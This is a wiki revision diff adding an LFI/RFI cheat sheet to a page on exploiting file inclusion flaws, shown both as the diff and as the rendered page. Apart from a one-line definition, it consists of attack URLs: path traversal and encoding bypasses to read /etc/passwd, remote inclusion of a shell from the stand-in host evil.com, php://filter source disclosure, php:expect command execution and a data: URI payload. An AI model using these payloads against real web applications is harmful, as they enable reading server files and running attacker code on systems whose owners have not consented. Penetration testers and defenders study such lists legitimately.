Difference between revisions of "Exploiting Local/Remove File Inclusion"
(→What is LFI / RFI?) |
|||
| Line 1: | Line 1: | ||
= What is LFI / RFI? = | = What is LFI / RFI? = | ||
Local/Remove File Inclusion vulnerability allows an attacker to exploit a dynamic file inclusion mechanism of a web application to access files outside the intended spectre. | Local/Remove File Inclusion vulnerability allows an attacker to exploit a dynamic file inclusion mechanism of a web application to access files outside the intended spectre. | ||
| + | == LFI / RFI Cheat Sheet == | ||
| + | <syntaxhighlight> | ||
| + | http://example.com/index.php?page=../../../etc/passwd | ||
| + | http://example.com/index.php?page=../../../etc/passwd%00 | ||
| + | http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd | ||
| + | http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00 | ||
| + | http://example.com/index.php?page=../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\[ADD MORE]\.\. | ||
| + | http://example.com/index.php?page=../../../../[…]../../../../../etc/passwd | ||
| + | http://example.com/index.php?page=....//....//etc/passwd | ||
| + | http://example.com/index.php?page=..///////..////..//////etc/passwd | ||
| + | http://example.com/index.php?page=http://evil.com/shell.txt | ||
| + | http://example.com/index.php?page=http://evil.com/shell.txt%00 | ||
| + | http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt | ||
| + | http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php | ||
| + | http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php | ||
| + | http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php | ||
| + | http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd | ||
| + | http://example.com/index.php?page=php:expect://id | ||
| + | http://example.com/index.php?page=php:expect://ls | ||
| + | http://example.com/index.php?page=path/to/uploaded/file.png | ||
| + | http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+ | ||
| + | </syntaxhighlight> | ||
Revision as of 14:23, 26 April 2018
What is LFI / RFI?
Local/Remove File Inclusion vulnerability allows an attacker to exploit a dynamic file inclusion mechanism of a web application to access files outside the intended spectre.
LFI / RFI Cheat Sheet
http://example.com/index.php?page=../../../etc/passwd
http://example.com/index.php?page=../../../etc/passwd%00
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
http://example.com/index.php?page=../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\[ADD MORE]\.\.
http://example.com/index.php?page=../../../../[…]../../../../../etc/passwd
http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=http://evil.com/shell.txt
http://example.com/index.php?page=http://evil.com/shell.txt%00
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
http://example.com/index.php?page=php:expect://id
http://example.com/index.php?page=php:expect://ls
http://example.com/index.php?page=path/to/uploaded/file.png
http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+